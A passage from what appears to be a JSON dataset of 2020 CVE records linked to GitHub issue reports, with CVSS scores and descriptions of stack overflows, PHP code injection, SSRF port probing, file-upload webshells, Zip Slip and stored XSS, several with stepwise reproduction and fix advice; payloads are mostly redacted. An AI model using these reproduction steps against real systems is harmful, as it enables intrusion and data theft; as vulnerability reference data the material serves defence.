NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume 
PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG SUMMARY: APITAG stack overflow NUMBERTAG malloc NUMBERTAG ABORTING",
  55038. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55039. "severity": "HIGH",
  55040. "baseScore": 7.5,
  55041. "impactScore": 3.6,
  55042. "exploitabilityScore": 3.9
  55043. },
  55044. {
  55045. "CVE_ID": "CVE-2020-22882",
  55046. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/351",
  55047. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/351",
  55048. "Repo_new": "moddable-opensource/moddable",
  55049. "Issue_Created_At": "2020-04-17T16:01:51Z",
  55050. "description": "Type confusion vulnerability. Environment CODETAG poc ERRORTAG vulnerability description: The stack traceback is shown in the figure: FILETAG When processing js code, first APITAG will be called to generate a node tree, and when it encounters: FILETAG It can cause errors in object references, which can cause type confusion. The specific vulnerability trigger point is on line APITAG NUMBERTAG as shown in the figure FILETAG The current item is considered a temporary function type that has been declared, but in fact it is an undefined array type in poc. APITAG construction FILETAG Simply assign a value to an undefined array.",
  55051. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55052. "severity": "HIGH",
  55053. "baseScore": 7.5,
  55054. "impactScore": 3.6,
  55055. "exploitabilityScore": 3.9
  55056. },
  55057. {
  55058. "CVE_ID": "CVE-2020-22884",
  55059. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1799",
  55060. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1799",
  55061. "Repo_new": "espruino/espruino",
  55062. "Issue_Created_At": "2020-04-15T16:09:44Z",
  55063. "description": "buffer overflow. Environment APITAG poc: ERRORTAG vulnerability description: The poc will cause memory corruption in the parser. Below is the output of ASAN\uff1a ERRORTAG",
  55064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55065. "severity": "CRITICAL",
  55066. "baseScore": 9.8,
  55067. "impactScore": 5.9,
  55068. "exploitabilityScore": 3.9
  55069. },
  55070. {
  55071. "CVE_ID": "CVE-2020-22885",
  55072. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/133",
  55073. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/133",
  55074. "Repo_new": "ccxvii/mujs",
  55075. "Issue_Created_At": "2020-04-17T06:37:43Z",
  55076. "description": "Stack overflow. Environment APITAG PoC: ERRORTAG Vulnerability description: The PoC causes a stack overflow (stack exhaustion), crashing the interpreter; the practical impact is denial of service, matching the A:H-only CVSS vector. As shown below: ERRORTAG",
  55077. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55078. "severity": "HIGH",
  55079. "baseScore": 7.5,
  55080. "impactScore": 3.6,
  55081. "exploitabilityScore": 3.9
  55082. },
  55083. {
  55084. "CVE_ID": "CVE-2020-22886",
  55085. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/134",
  55086. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/134",
  55087. "Repo_new": "ccxvii/mujs",
  55088. "Issue_Created_At": "2020-04-17T14:17:17Z",
  55089. "description": "Stack overflow. Environment APITAG PoC ERRORTAG Vulnerability description: The PoC causes a stack overflow (stack exhaustion), crashing the interpreter; the practical impact is denial of service, matching the A:H-only CVSS vector. As shown below: ERRORTAG",
  55090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55091. "severity": "HIGH",
  55092. "baseScore": 7.5,
  55093. "impactScore": 3.6,
  55094. "exploitabilityScore": 3.9
  55095. },
  55096. {
  55097. "CVE_ID": "CVE-2020-22907",
  55098. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/16",
  55099. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/16",
  55100. "Repo_new": "pcmacdon/jsish",
  55101. "Issue_Created_At": "2020-05-20T14:49:25Z",
  55102. "description": "Heap overflow. Environment APITAG PoC: ERRORTAG Vulnerability description: Below is the ASAN output; it shows a heap buffer overflow in jsi_evalcode_sub APITAG FILETAG FILETAG",
  55103. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55104. "severity": "HIGH",
  55105. "baseScore": 7.5,
  55106. "impactScore": 3.6,
  55107. "exploitabilityScore": 3.9
  55108. },
  55109. {
  55110. "CVE_ID": "CVE-2020-22937",
  55111. "Issue_Url_old": "https://github.com/leadscloud/EmpireCMS/issues/4",
  55112. "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/4",
  55113. "Repo_new": "leadscloud/empirecms",
  55114. "Issue_Created_At": "2020-04-21T12:03:46Z",
  55115. "description": "Code Injection APITAG Brief of this vulnerability APITAG : during CMS installation, an attacker can write PHP code into the config file and thereby execute arbitrary PHP code. Test Environment Windows NUMBERTAG PHP APITAG Affected version APITAG NUMBERTAG Vulnerable Code APITAG CODETAG The database table prefix with APITAG APITAG APITAG APITAG ERRORTAG function APITAG parses APITAG into APITAG and then updates the config file by calling APITAG ERRORTAG APITAG parses mydbtbpre into APITAG and then writes APITAG into APITAG Vulnerability display When installing the CMS, set APITAG FILETAG Trigger vulnerability FILETAG Vulnerability description && Fix suggestion The attacker can write malicious PHP code into the config file via the install script and execute it to obtain a webshell. Fix: strictly validate the table-prefix value against an allowlist (e.g. only [A-Za-z0-9_]) or escape it before writing it into the config file, rather than relying on a blocklist of PHP characters; additionally, remove or lock the installer after setup and restrict execution permissions on the config directory.",
  55116. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55117. "severity": "CRITICAL",
  55118. "baseScore": 9.8,
  55119. "impactScore": 5.9,
  55120. "exploitabilityScore": 3.9
  55121. },
  55122. {
  55123. "CVE_ID": "CVE-2020-23015",
  55124. "Issue_Url_old": "https://github.com/opnsense/core/issues/4061",
  55125. "Issue_Url_new": "https://github.com/opnsense/core/issues/4061",
  55126. "Repo_new": "opnsense/core",
  55127. "Issue_Created_At": "2020-04-24T17:37:52Z",
  55128. "description": "URL open redirect leads to phishing attacks. Important notices Before you add a new report, we ask you kindly to acknowledge the following: [ ] I have read the contributing guide lines at FILETAG [ ] I have searched the existing issues and I'm convinced that mine is new. Describe the bug The redirect URL on the login page is not validated, so it can redirect the user to any website. An attacker can send a URL like APITAG to a firewall user; if the user enters their credentials and logs in, they are redirected to the malicious page (which may then impersonate the login form). Fix: only accept relative, same-origin redirect targets (reject absolute URLs, protocol-relative \"//host\" forms and any scheme). To Reproduce Steps to reproduce the behavior NUMBERTAG Access APITAG NUMBERTAG Enter the credentials NUMBERTAG The user is redirected to APITAG Environment APITAG NUMBERTAG amd NUMBERTAG APITAG NUMBERTAG RELEASE p NUMBERTAG HBSD APITAG NUMBERTAG d NUMBERTAG Sep NUMBERTAG",
  55129. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55130. "severity": "MEDIUM",
  55131. "baseScore": 6.1,
  55132. "impactScore": 2.7,
  55133. "exploitabilityScore": 2.8
  55134. },
  55135. {
  55136. "CVE_ID": "CVE-2020-23079",
  55137. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/806",
  55138. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/806",
  55139. "Repo_new": "halo-dev/halo",
  55140. "Issue_Created_At": "2020-04-29T08:03:08Z",
  55141. "description": "SSRF vulnerability in the SMTP configuration, which can be used to scan the server's internal network. APITAG the password of the admin (back-end) login account is transmitted in plain text, so the back end can be entered by brute-force cracking: APITAG The problem lies in the SMTP server configuration, which lets the user specify an arbitrary host address and port FILETAG APITAG is a hidden APITAG () interface in the code that tests connectivity to the mail server FILETAG NUMBERTAG It is a APITAG that depends on springframework: FILETAG NUMBERTAG So this interface can be used as a probe: set the address to APITAG when the target port is open, the response time is short NUMBERTAG millis: FILETAG APITAG when the port is not open, the response time is long NUMBERTAG millis: FILETAG APITAG This timing side channel can be used to enumerate open ports on the server and on other hosts in the intranet in batches, and then carry out further attacks. Fix: restrict the connectivity-test endpoint to authenticated administrators, and validate the host (resolving DNS first) against an allowlist or reject loopback, private and link-local address ranges so it cannot be pointed at internal hosts.",
  55142. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  55143. "severity": "HIGH",
  55144. "baseScore": 7.5,
  55145. "impactScore": 3.6,
  55146. "exploitabilityScore": 3.9
  55147. },
  55148. {
  55149. "CVE_ID": "CVE-2020-23083",
  55150. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg/issues/56",
  55151. "Issue_Url_new": "https://github.com/zhangdaiscott/jeecg/issues/56",
  55152. "Repo_new": "zhangdaiscott/jeecg",
  55153. "Issue_Created_At": "2020-04-30T02:52:25Z",
  55154. "description": "jeecg NUMBERTAG file upload vulnerability. On login, APITAG the APITAG first restricts the allowed file suffix URLTAG FILETAG However, the system only validates the upload on the front end (client side); the request can be intercepted with Burp Suite and the file name's suffix changed to APITAG, and the upload then succeeds FILETAG The uploaded file is reachable at the following address, so the upload vulnerability can be used to obtain a webshell FILETAG FILETAG Fix: enforce the extension allowlist and content-type checks on the server side, rename uploaded files, and store them outside the web root (or where script execution is disabled).",
  55155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55156. "severity": "CRITICAL",
  55157. "baseScore": 9.8,
  55158. "impactScore": 5.9,
  55159. "exploitabilityScore": 3.9
  55160. },
  55161. {
  55162. "CVE_ID": "CVE-2020-23109",
  55163. "Issue_Url_old": "https://github.com/strukturag/libheif/issues/207",
  55164. "Issue_Url_new": "https://github.com/strukturag/libheif/issues/207",
  55165. "Repo_new": "strukturag/libheif",
  55166. "Issue_Created_At": "2020-02-24T02:04:49Z",
  55167. "description": "Heap overflow in APITAG I spotted this overflow in APITAG . How to reproduce: APITAG FILETAG Here is the ASAN report: ERRORTAG",
  55168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  55169. "severity": "HIGH",
  55170. "baseScore": 8.1,
  55171. "impactScore": 5.2,
  55172. "exploitabilityScore": 2.8
  55173. },
  55174. {
  55175. "CVE_ID": "CVE-2020-23171",
  55176. "Issue_Url_old": "https://github.com/nim-lang/zip/issues/54",
  55177. "Issue_Url_new": "https://github.com/nim-lang/zip/issues/54",
  55178. "Repo_new": "nim-lang/zip",
  55179. "Issue_Created_At": "2020-05-10T02:44:06Z",
  55180. "description": "Directory traversal vulnerability from libzip. Issue Given a crafted zip file containing an entry whose file name is APITAG , zip extracts the file to APITAG , whereas it should be extracted to APITAG . This vulnerability (\"Zip Slip\") could allow an attacker who supplies the archive to write a file to an arbitrary path writable by the extracting process, outside the intended extraction directory. How to reproduce You can try to reproduce this vulnerability using FILETAG , you can find the APITAG here URLTAG",
  55181. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  55182. "severity": "MEDIUM",
  55183. "baseScore": 5.5,
  55184. "impactScore": 3.6,
  55185. "exploitabilityScore": 1.8
  55186. },
  55187. {
  55188. "CVE_ID": "CVE-2020-23172",
  55189. "Issue_Url_old": "https://github.com/kuba--/zip/issues/123",
  55190. "Issue_Url_new": "https://github.com/kuba--/zip/issues/123",
  55191. "Repo_new": "kuba--/zip",
  55192. "Issue_Created_At": "2020-05-09T15:30:27Z",
  55193. "description": "Directory traversal vulnerability when handling a crafted zip file. On the latest version NUMBERTAG and the master branch of zip, there is a vulnerability that can be triggered by a crafted zip file: specifically, an entry with a file name such as APITAG is extracted as APITAG , while the correct destination is APITAG . To reproduce the issue, you may try to extract this FILETAG , which contains two files APITAG and APITAG . Here is the APITAG repo] ( URLTAG The root cause is that zip does not normalize the path in APITAG in APITAG ; the extraction path must be canonicalized and checked to remain inside the destination directory before any file is written. I will try to send a pull request to fix it later.",
  55194. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  55195. "severity": "MEDIUM",
  55196. "baseScore": 5.5,
  55197. "impactScore": 3.6,
  55198. "exploitabilityScore": 1.8
  55199. },
  55200. {
  55201. "CVE_ID": "CVE-2020-23190",
  55202. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/667",
  55203. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/667",
  55204. "Repo_new": "phplist/phplist3",
  55205. "Issue_Created_At": "2020-05-26T04:03:24Z",
  55206. "description": "Cross Site Scripting Vulnerability on APITAG Mail\" feature in phpList (the original title says \"Lavelite\", apparently a copy-paste slip; the issue is filed against phplist3). Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Mail\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click \"import by uploading a file with emails NUMBERTAG Insert payload: APITAG APITAG load=alert('XSS')// APITAG NUMBERTAG Click APITAG NUMBERTAG View the preview to trigger XSS NUMBERTAG View the preview and observe the payload returned in the response, confirming Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page (the payload here appears to rely on an event-handler attribute rather than a script tag). Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  55207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55208. "severity": "MEDIUM",
  55209. "baseScore": 5.4,
  55210. "impactScore": 2.7,
  55211. "exploitabilityScore": 2.3
  55212. },
  55213. {
  55214. "CVE_ID": "CVE-2020-23192",
  55215. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/671",
  55216. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/671",
  55217. "Repo_new": "phplist/phplist3",
  55218. "Issue_Created_At": "2020-05-29T16:45:03Z",
  55219. "description": "Cross Site Scripting Vulnerability on APITAG administrators\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG administrators\" feature; a payload planted in an administrator's details fires for whoever later views that administrator. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG administrators NUMBERTAG Click \"admin\" edit information admin NUMBERTAG Insert payload: \"> APITAG FILETAG // \"> APITAG NUMBERTAG Click APITAG Changes NUMBERTAG View the preview to trigger XSS NUMBERTAG View the preview and observe the payload returned in the response, confirming Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page. Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Insert payload FILETAG Click APITAG Changes\" > Click APITAG of administrator\" > View Stored XSS FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  55220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55221. "severity": "MEDIUM",
  55222. "baseScore": 5.4,
  55223. "impactScore": 2.7,
  55224. "exploitabilityScore": 2.3
  55225. },
  55226. {
  55227. "CVE_ID": "CVE-2020-23194",
  55228. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/678",
  55229. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/678",
  55230. "Repo_new": "phplist/phplist3",
  55231. "Issue_Created_At": "2020-06-07T14:34:39Z",
  55232. "description": "Cross Site Scripting Vulnerability on APITAG subscribers\" feature in APITAG NUMBERTAG via SVG file upload. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG subscribers\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Import payload file SVG: FILETAG NUMBERTAG Click button APITAG NUMBERTAG Click select APITAG NUMBERTAG Click button \"CONTINUE NUMBERTAG View the preview to trigger XSS NUMBERTAG View the preview and observe the payload returned in the response, confirming Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page. Because the vector here is an uploaded SVG (an XML document that can carry script and event handlers), the import should accept only plain-text/CSV content, or uploads must be sanitized and never served inline from the application origin (e.g. Content-Disposition: attachment). Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG Trigger XSS FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
  55233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55234. "severity": "MEDIUM",
  55235. "baseScore": 5.4,
  55236. "impactScore": 2.7,
  55237. "exploitabilityScore": 2.3
  55238. },
  55239. {
  55240. "CVE_ID": "CVE-2020-23205",
  55241. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/465",
  55242. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/465",
  55243. "Repo_new": "monstra-cms/monstra",
  55244. "Issue_Created_At": "2020-05-22T18:18:39Z",
  55245. "description": "Cross Site Scripting Vulnerability on APITAG Settings\" in Monstra version NUMBERTAG Hi, Team Monstra! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Settings\" feature of Monstra. Since the injected value appears to be rendered on the public site (see the View Site step), the payload would fire for ordinary visitors, not only for panel users. To Reproduce Steps to reproduce the behavior: APITAG into the panel Monstra NUMBERTAG Go to APITAG NUMBERTAG Click APITAG > APITAG NUMBERTAG Insert Payload XSS: \"> APITAG '> APITAG // \"> APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Save NUMBERTAG click View Site > XSS alert message! Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots a. Info Monstra version: FILETAG b. insert XSS payload: FILETAG c. view site > XSS alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version: I hope you fix it ASAP!",
  55246. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55247. "severity": "MEDIUM",
  55248. "baseScore": 5.4,
  55249. "impactScore": 2.7,
  55250. "exploitabilityScore": 2.3
  55251. },
  55252. {
  55253. "CVE_ID": "CVE-2020-23207",
  55254. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/664",
  55255. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/664",
  55256. "Repo_new": "phplist/phplist3",
  55257. "Issue_Created_At": "2020-05-25T04:25:57Z",
  55258. "description": "Cross Site Script Vulnerability on APITAG Attributes\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"configure attributes\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the phplist panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Values' > APITAG new NUMBERTAG Insert Payload XSS: '> APITAG NUMBERTAG Add new Woonplaats NUMBERTAG XSS alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page Screenshots NUMBERTAG login FILETAG NUMBERTAG Add new FILETAG NUMBERTAG Insert XSS payload FILETAG NUMBERTAG XSS alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version I hope you fix it ASAP",
  55259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55260. "severity": "MEDIUM",
  55261. "baseScore": 5.4,
  55262. "impactScore": 2.7,
  55263. "exploitabilityScore": 2.3
  55264. },
  55265. {
  55266. "CVE_ID": "CVE-2020-23208",
  55267. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/665",
  55268. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/665",
  55269. "Repo_new": "phplist/phplist3",
  55270. "Issue_Created_At": "2020-05-25T04:59:40Z",
  55271. "description": "Cross Site Script Vulnerability on APITAG a Campaign\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG a Campaign\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the phplist panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG or continue a campaign' > 'no title NUMBERTAG Insert Payload XSS: 'to email address(es)' // \"> APITAG FILETAG NUMBERTAG Next NUMBERTAG XSS alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page Screenshots FILETAG FILETAG FILETAG Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I hope you fix it ASAP",
  55272. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55273. "severity": "MEDIUM",
  55274. "baseScore": 5.4,
  55275. "impactScore": 2.7,
  55276. "exploitabilityScore": 2.3
  55277. },
  55278. {
  55279. "CVE_ID": "CVE-2020-23209",
  55280. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/666",
  55281. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/666",
  55282. "Repo_new": "phplist/phplist3",
  55283. "Issue_Created_At": "2020-05-25T18:43:58Z",
  55284. "description": "Cross Site Script Vulnerability on APITAG Lists\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Lists\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the phplist panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Lists' > APITAG a lists NUMBERTAG Insert Payload XSS: 'to email address(es)' '> APITAG NUMBERTAG Save > Click APITAG > APITAG some subscribers NUMBERTAG XSS alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page Screenshots FILETAG FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I hope you fix it ASAP!",
  55285. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55286. "severity": "MEDIUM",
  55287. "baseScore": 5.4,
  55288. "impactScore": 2.7,
  55289. "exploitabilityScore": 2.3
  55290. },
  55291. {
  55292. "CVE_ID": "CVE-2020-23214",
  55293. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/669",
  55294. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/669",
  55295. "Repo_new": "phplist/phplist3",
  55296. "Issue_Created_At": "2020-05-27T16:15:59Z",
  55297. "description": "Cross Site Script Vulnerability on APITAG Lists\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Lists\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the phplist panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Lists' > APITAG Lists' > APITAG Categories NUMBERTAG Insert Payload XSS: '> APITAG NUMBERTAG Save and Back > click chose 'CATEGORY' new > Save > click Subscribers NUMBERTAG XSS alert message Screenshots FILETAG FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I hope you fix it ASAP!",
  55298. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55299. "severity": "MEDIUM",
  55300. "baseScore": 5.4,
  55301. "impactScore": 2.7,
  55302. "exploitabilityScore": 2.3
  55303. },
  55304. {
  55305. "CVE_ID": "CVE-2020-23217",
  55306. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/672",
  55307. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/672",
  55308. "Repo_new": "phplist/phplist3",
  55309. "Issue_Created_At": "2020-05-30T11:15:26Z",
  55310. "description": "Filter-bypass Cross Site Scripting Vulnerability on \"IMPORT EMAILS\" feature in php list NUMBERTAG Hi Team phplist3, I found a small bug! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"IMPORT EMAILS\" feature. It affects both options of the SEND A CAMPAIGN feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the phplist panel NUMBERTAG Go to PATHTAG NUMBERTAG Choose APITAG > Click APITAG some subscribers' > Choose NUMBERTAG options APITAG and paste list of emails) > APITAG a list NUMBERTAG Insert Payload XSS: APITAG X APITAG FILETAG NUMBERTAG Save NUMBERTAG XSS alert message Screenshots FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Expected behavior The removal of script tags is not sufficient to prevent an XSS attack; any stored value must be HTML-entity encoded at the point where it is rendered back into the page Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I hope you fix it ASAP!",
  55311. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55312. "severity": "MEDIUM",
  55313. "baseScore": 5.4,
  55314. "impactScore": 2.7,
  55315. "exploitabilityScore": 2.3
  55316. },
  55317. {
  55318. "CVE_ID": "CVE-2020-23219",
  55319. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/466",
  55320. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/466",
  55321. "Repo_new": "monstra-cms/monstra",
  55322. "Issue_Created_At": "2020-05-22T19:16:40Z",
  55323. "description": "Remote Code Execution via Snippets module in Monstra version NUMBERTAG Describe the bug An authenticated user with access to the Snippets module can insert arbitrary PHP code into a snippet, and the server executes it when the page is rendered (remote code execution on the server). Note that this requires authenticated panel access (PR:L in the CVSS vector). To Reproduce NUMBERTAG Log into the panel NUMBERTAG Go to APITAG NUMBERTAG Click edit NUMBERTAG Insert payload APITAG NUMBERTAG output); ?> APITAG APITAG NUMBERTAG Save and Exit NUMBERTAG Go to index view Screenshots FILETAG FILETAG",
  55324. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  55325. "severity": "HIGH",
  55326. "baseScore": 8.8,
  55327. "impactScore": 5.9,
  55328. "exploitabilityScore": 2.8
  55329. },
  55330. {
  55331. "CVE_ID": "CVE-2020-23226",
  55332. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3549",
  55333. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3549",
  55334. "Repo_new": "cacti/cacti",
  55335. "Issue_Created_At": "2020-05-10T18:12:32Z",
